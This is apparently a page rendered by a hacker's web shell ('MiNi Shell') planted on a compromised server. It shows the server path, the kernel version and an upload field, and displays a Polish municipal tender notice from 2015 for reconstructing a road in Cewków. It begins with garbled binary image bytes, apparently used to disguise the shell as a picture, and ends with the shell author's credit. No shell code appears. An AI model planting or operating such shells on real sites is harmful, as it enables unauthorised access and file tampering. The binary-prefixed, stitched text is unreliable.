JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150326/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150326/67268-N-2015.html

<p class="kh_header"><b>Stary Dzików: PRZEBUDOWA DROGI GMINNEJ NR 105022R NR EWID.  DZ. 5056 
W MIEJSCOWOŚCI CEWKÓW KM 0 + 000 - KM 0 + 750
WRAZ   Z PRZEBUDOWĄ PRZEPUSTÓW KM  0 + 002</b><br>
<b>Numer ogłoszenia: 67268 - 2015; data zamieszczenia: 26.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stary Dzików , ul. T. Kościuszki 79, 37-632 Stary Dzików, woj. podkarpackie, tel. 0-16 631 80 50, faks 0-16 631 80 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starydzikow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA DROGI GMINNEJ NR 105022R NR EWID.  DZ. 5056 
W MIEJSCOWOŚCI CEWKÓW KM 0 + 000 - KM 0 + 750
WRAZ   Z PRZEBUDOWĄ PRZEPUSTÓW KM  0 + 002.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przewidziana do przebudowy droga gminna nr 105022R w miejsc. Cewków znajduje się na terenie Gminy Stary Dzików, powiat lubaczowski, województwo podkarpackie, droga stanowi dojazd mieszkańców do istniejących gospodarstw i dojazd do pól uprawnych. Administratorem drogi jest Gmina Stary Dzików. Lokalizację projektowanego odcinka przyjęto zgodnie z zakresem robót do wykonania i zawartymi porozumieniami pomiędzy Gminą Stary Dzików a autorem opracowania. Zakres przebudowy przyjęto do opracowania  wg poniższej lokalizacji:                                                                                                                                                                                                                                             
- PPO km 0 + 000 krawędź skrzyżowania z Stary Dzików - Moszczanica
- KPO km 0 + 750 na wysokości istniejących zjazdów str. L i P

1.1	Charakterystyka techniczna
- klasa techniczna D, Vp = 30km_h
- kategoria ruchu  KR 1 - 2
- teren płaski
- przekrój poprzeczny szlakowy km 0 + 000 - km 0 + 750
- szerokość jezdni km 0 + 000 - km 0 + 040 - 3.50m
                              km 0 + 040 - km 0 + 750 - 3.00m  
- szerokość pobocza ziemnego km 0 + 000 - km 0 + 750 str. L i P  0.50m - 0.75m
- projektowana nawierzchnia drogi bitumiczna + wzmocnienie
- odwodnienie drogi system spadków podłużnych i poprzecznych, rowów otwartych i przepustów
- przebieg drogi km 0 + 000 - km 0 + 750 teren zabudowany
- charakter ruchu ogólnodostępny,  ruch lokalny,  gospodarczy, turystyczny

1.2 Trasa
      Zakres przebudowy drogi przyjęto do projektu wg poniższej lokalizacji:
- PPO km 0 + 000 krawędź skrzyżowania z Stary Dzików - Moszczanica
- KPO km 0 + 750 na wysokości istniejących zjazdów str. L i P
Działki objęte przebudową stanowią własność Gminy Stary Dzików  obręb geodezyjny Cewków działka nr ewidencyjny 5056.

1.3 Przekrój podłużny
       Na całym odcinku niweletę projektowanej drogi dostosowano do istniejącego terenu uwzględniając spadki podłużne i poprzeczne terenu, oraz odprowadzenie wód do istniejących przepustów. Spadki podłużne niwelety uwarunkowano przebiegiem istniejącej drogi. W związku z tym, że istniejąca nawierzchnia posiada ubytki nawierzchni, wyboje i koleiny przed wykonaniem zasadniczej warstwy bitumicznej wykonać należy uzupełnienie ubytków, profilowanie kruszywem 0_32 śr. gr. 2cm, oraz wzmocnienie z kruszywa sortowanego i tłucznia gr. 7cm - 15cm a następnie warstwa bitumiczna ścieralna gr 6cm.

1.4	Przekrój normalny
       Spadek poprzeczny poboczy ziemnych 6% w kierunku rowu. Spadek jezdni daszkowy na prostej 2%. Na łukach jednostronny (spadki na łukach poziomych przyjąć wg istniejących), rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp od 1:1 do 1 : 1.5. 

1.5 Projektowana nawierzchnia km 0 + 000 - km 0 + 550 
- 3cm warstwa ścieralna z betonu asfaltowego dla KR 1 - 2 
Uwaga! zostanie wykonana w II etapie
- 6cm warstwa wiążąca (ścieralna) z betonu asfaltowego dla KR 1 - 2
- 7cm górna warstwa nawierzchni z kruszywa sortowanego 0_32
- 2cm warstwa profilowa z kruszywa sortowanego 0_32

1.5 Projektowana nawierzchnia km  0 + 550  - km 0 + 650 
- 3cm warstwa ścieralna z betonu asfaltowego dla KR 1 - 2 
Uwaga! zostanie wykonana w II etapie
- 6cm warstwa wiążąca (ścieralna) z betonu asfaltowego dla KR 1 - 2
- 5cm górna warstwa nawierzchni z kruszywa sortowanego 0_32
- 7cm dolna warstwa nawierzchni z tłucznia 20_40
- profilowanie istniejącej nawierzchni równiarką do zadanych spadków z zagęszczeniem walcem

1.7 Projektowana nawierzchnia km  0 + 650  - km 0 + 750 
- 3cm warstwa ścieralna z betonu asfaltowego dla KR 1 - 2 
Uwaga! zostanie wykonana w II etapie
- 6cm warstwa wiążąca (ścieralna) z betonu asfaltowego dla KR 1 - 2
- 5cm górna warstwa nawierzchni z kruszywa sortowanego 0_32
- 10cm dolna warstwa nawierzchni z tłucznia 20_40
- profilowanie istniejącej nawierzchni równiarką do zadanych spadków z zagęszczeniem walcem

1.8 Nawierzchnia zjazdów
- 5cm warstwa ścieralna z betonu asfaltowego dla KR 1 - 2 
Uwaga! zostanie wykonana w II etapie 
- 15cm górna warstwa nawierzchni z tłucznia kamiennego 20_63
- 15cm warstwa odsączająca z piasku

1.9 Odwodnienie
     Wody powierzchniowe odprowadzane będą z nawierzchni za pomocą spadków podłużnych i poprzecznych w przyległy teren i do istniejących rowów przydrożnych, które wymagają odmulenia 
(Uwaga! Gmina Stary Dzików wykona w II etapie). 
- odmulenie rowów km 0 + 002 - km 0 + 032 str. P
- odmulenie  rowów km 0 + 002 - km 0 + 022 str. L
- konserwacja rowu przez skoszenie trawy i porostów z utylizacją km 0 + 100 - km 0 + 700 str. P
- konserwacja rowu przez skoszenie trawy i porostów z utylizacją km 0 + 100 - km 0 + 700 str. L
Wykonując odmulenie istniejącego rowu należy zachować istniejące spadki podłużne. Przed wykonaniem robót należy zniwelować istniejący rów a następnie należy prowadzić roboty w taki sposób aby umożliwić spływ wody do istniejących cieków wodnych. Krzaki należy wyciąć a następnie zutylizować. Rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp od 1:1 do 1 : 1.5, głębokość średnia od 0.50cm do 0.70cm.
Na omawianym odcinku projektuje się przebudowę przepustów.
- km 0 + 002 przepust fi 50 dł. 8mb wykonanie części przelotowej z wykonaniem murków czołowych
Na przepustach projektuje się: rozebranie istniejących przepustów, przebudowa istniejących części przelotowych, wykonanie murków czołowych. Projektuje się ułożenie części przelotowej z rur PECOR OPTIMA SN8 dwuściennych karbowanych o sztywności obwodowej 8kPa z PEHD lub równoważnych. Przy przebudowie przepustów należy zachować istniejące rzędne posadowienia wlotu  i wylotu przepustu oraz spadki części przelotowej.  Murki czołowe należy wykonać betonowe z betonu B - 25, dopuszcza się ustawienie murków prefabrykowanych na fundamencie.

1.10	 Zjazdy
       Na projektowanym odcinku znajdują się zjazdy do pól i zjazdy zbiorcze. Lokalizacja   i szczegółowe zakresy robót przedstawiono w Tabeli zjazdów. Ww zjazdy są istniejące, roboty będą polegać jedynie na przebudowie  nawierzchni zjazdów na długości 1.50m. 

1.11	 Skrzyżowania
- km 0 + 000 krawędź skrzyżowania z drogą Stary Dzików - Moszczanica

1.12  Oznakowanie pionowe
      Oznakowanie pionowe pozostaje bez zmiany. Projektuje się wykonanie wymiany istniejących słupków i tablic znaków. Projektuje się ustawienie słupków do znaków drogowych z rur stalowych fi 50mm, z zamontowaniem, zabetonowaniem i zasypaniem. Całkowita dł. słupka 3.5m. Tablice mocowane do słupków,  tablice znaków z foli odblaskowej 3M, wielkość średnie.
- km 0 + 020 str. L znak B - 20, słupek metalowy

1.13  KOLIZJE
	Usytuowanie urządzeń obcych przedstawiono na planie sytuacyjnym. W terenie mogą znajdować się  następujące urządzenia.
- sieć wodociągowa
- linia energetyczna podziemna i naziemna
- lina teletechniczna podziemna i naziemna 
- linia gazowa
Roboty w obrębie ww urządzeń wykonywać ręcznie, pod nadzorem odpowiednich służb..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 45.23.33.20-8, 45.22.12.44-4, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości 5 000,00  zł, 
 (słownie: pięć tysięcy złotych 00 100)
Termin wniesienia wadium: 
1) Wadium wnosi się przed upływem terminu składania ofert. Wadium uznaje się za wniesione, jeżeli: 
a) wnoszone w formie pieniądza znalazło się na rachunku bankowym zamawiającego przed upływem terminu na składanie ofert, 
b) wnoszone w pozostałych formach oryginały dokumentów zostały złożone w pok. nr 5 , przed upływem terminu składania ofert. 
2)Dokument potwierdzający wniesienie wadium należy dołączyć do oferty, przy czym: 
a) wadium w formie pieniądza należy wnieść na rachunek bankowy BS Stary Dzików nr 21 9094 0006 2001 0000 0039 0001
b) w przypadku wniesienia wadium w formie innej niż pieniądz do oferty należy załączyć kserokopię dokumentu stanowiącego wadium. Oryginał tego dokumentu należy złożyć w pok. nr 5 przed upływem terminu składania ofert. 
Formy wniesienia wadium: 
Wadium może być wnoszone w jednej lub kilku następujących formach: 
a) pieniądzu, 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c) gwarancjach bankowych, 
d) gwarancjach ubezpieczeniowych, 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (DzU nr 109, poz. 1158 ze zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia  (potwierdzone dokumentami, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone) polegające na realizacji budowy, przebudowy, remontów obiektów drogowych. Wartość każdego z zadań nie może być mniejsza niż  100 000  zł brutto. 
Uwaga nr 1:
W przypadku gdy w zamówieniu przedstawionym przez wykonawcę jako spełniający warunek (określone w załączniku nr 5 do specyfikacji), rozliczenie pomiędzy wykonawcą a zamawiającym za wykonane zamówienie zostało dokonane w innej walucie niż w złotych polskich, wykonawca (dla celu oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż w złotych polskich - na podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów A średnich walut obcych Narodowego Banku Polskiego na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, tj. 24.03.2015r</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej: 
  jedną osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami  w zakresie objętym przedmiotem zamówienia tj. branży drogowej oraz posiadającą doświadczenie w pełnieniu funkcji kierownika budowy przy realizacji min. jednego zadania spełniającego warunek opisany w rozdz. VIII pkt 1, 
Uwaga nr 2: 
Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (DzU z 2006 r. nr 156, poz. 1118 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (DzU z 2008 r. nr 63, poz. 394).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starydzikow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Starym Dzikowie
ul. Kościuszki 79
37-632 Stary Dzików
pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2015 godzina 09:00, miejsce: Urząd Gminy w Starym Dzikowie
ul. Kościuszki 79
37-632 Stary Dzików
pok. nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com